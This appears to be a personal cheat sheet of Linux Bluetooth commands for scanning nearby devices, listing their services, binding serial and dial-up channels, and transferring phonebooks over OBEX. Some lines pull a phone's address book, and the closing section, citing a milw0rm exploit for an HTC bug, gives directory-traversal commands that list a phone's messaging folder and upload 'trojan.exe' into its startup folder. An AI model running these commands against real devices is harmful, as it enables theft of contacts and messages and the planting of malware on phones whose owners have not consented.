#start the bluetooth daemon
/usr/sbin/hcid
/usr/sbin/sdpd
#scan for hosts
hcitool -i hci0 scan
#inq on the class of host
hcitool inq
#name on host
hcitool name <MAC address>
#info on host
hcitool info <MAC address>
#discover what applications are offered by host
sdptool browse <MAC address>

#Others...

# obtain the address book
obexftp -b 00:02:72:C0:F5:AE --channel 10 -g telecom/pb.vcf -v

#Ping

l2ping <MAC address>

# use ATI 
# 4 is the channel for the serial port
# after doing this, startup minicom and point it at /dev/rfcomm0
rfcomm bind 0 <MAC address> 4 
rfcomm show
rfcomm 0 <MAC address> 4
rfcomm release
# minicom

sdptool search DUN # search for dial up networks
l2ping <MAC address> # check connectivity
rfcomm bind 0 <MAC address> 2 # bind to rfcomm0 using channel 2
minicom # set it to use /dev/rfcomm0 and software flow control at 9600 baud

# getting a phonebook
obex_test -b 00:00:00:00:00:00 10
> s

# pushing a phonebook
obex_test -b <MAC address> 10
> c
> x
PUSH filename> dummy.vcf


# Other


sdptool search --bdaddr <MAC ADDRESS> DUN
rfcomm bind 0 <phone bd addr> <channel>

# HTC bug @ http://www.milw0rm.com/exploits/9117
# first step pairing at /etc/bluetooth/hcid.conf
rfcomm connect 1 00:22:A5:B7:CA:43 4
# Then can go outside bounds
obexftp -b 00:22:A5:B7:CA:43 -l "../../Windows/Messaging"
# Or upload files
obexftp -b 00:22:A5:B7:CA:43 -c "../../Windows/Startup" -p trojan.exe